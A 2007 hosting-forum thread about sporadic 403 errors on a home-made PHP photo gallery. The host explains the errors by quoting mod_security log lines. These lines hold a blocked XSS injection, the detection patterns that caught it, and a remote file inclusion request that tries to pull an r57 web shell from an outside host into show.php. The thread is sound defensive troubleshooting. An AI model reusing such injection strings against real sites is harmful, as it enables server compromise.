Occasional 403 error - UK Web Hosting | Dedicated Server Windows and Linux VPS Forum

**cowjam_2** · #1 (**permalink**) 20-07-2007, 10:35

My website is http://www.cowjam.co.uk

I have a PHP/mysql photo hosting thing I knocked up. I upload photos into directories, then thumbnails are generated and stored in a database and a menu link with the directory name is created.

The trouble is I get sporadic outbreaks of 403 errors (and a 404 as I don't have a 403) at all stages, and I really don't understand how or why. I'm thinking there's something up with my code but I don't understand why I'd get a Forbidden, so can't really debug.

**DPS Computing** · #2 (**permalink**) 20-07-2007, 11:46

It may be due to the mod_security rules.

Have you contacted support about this issue?

**cowjam_2** · #3 (**permalink**) 20-07-2007, 14:39

Quote:

Originally Posted by DPS Computing

It may be due to the mod_security rules.

Have you contacted support about this issue?

I haven't, no. I didn't want to in case it was my shonky code so I thought I'd ask in here in case anyone else is getting the same.

**DPS Computing** · #4 (**permalink**) 20-07-2007, 17:05

The only thing that should cause 403 errors is if permissions are wrong for the files / directories you are trying to access.

Have you checked the permissions on these directories? (where the images are uploaded / displayed from?)

**eUKhost.com** · #5 (**permalink**) 20-07-2007, 22:59

Hello Sam,

I was looking at error logs for your domain and following was what I found in the error logs :-

[Thu Jul 5 17:58:39 2007] [error] [client 24.243.134.17] mod_security: Access denied with redirect to [/]. Pattern match "<(.|\\\\n)+>" at REQUEST_URI [id "XSS_Check"] [severity "EMERGENCY"] [hostname "www.cowjam.co.uk"] [uri "/arct/alarmed.jpg\\"%20/><br><br><br><img%20src=\\"http://www.cowjam.co.uk/arct/hat.gif"]

[Sun Jul 8 03:09:47 2007] [error] [client 189.0.234.84] mod_security: Access denied with redirect to [/]. Pattern match "r57" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.cowjam.co.uk"] [uri "/show.php?cid=http://no.spam.ee/~tonu/phpshell/r57shell.txt?"]

Text highlighted by me in second message is something which shows vulnerability in code of show.php code as someone tried to upload a shell script on the server using your show.php script and mod_security blocked that query from getting executed.

You need to upgrade your photo gallery installation as it is highly insecure and disabling mod_security for your account will surely get your website hacked within a day.

Please contact our support team from http://support.eukhost.com and have them to upgrade your installation but don't disable mod_security at any cost.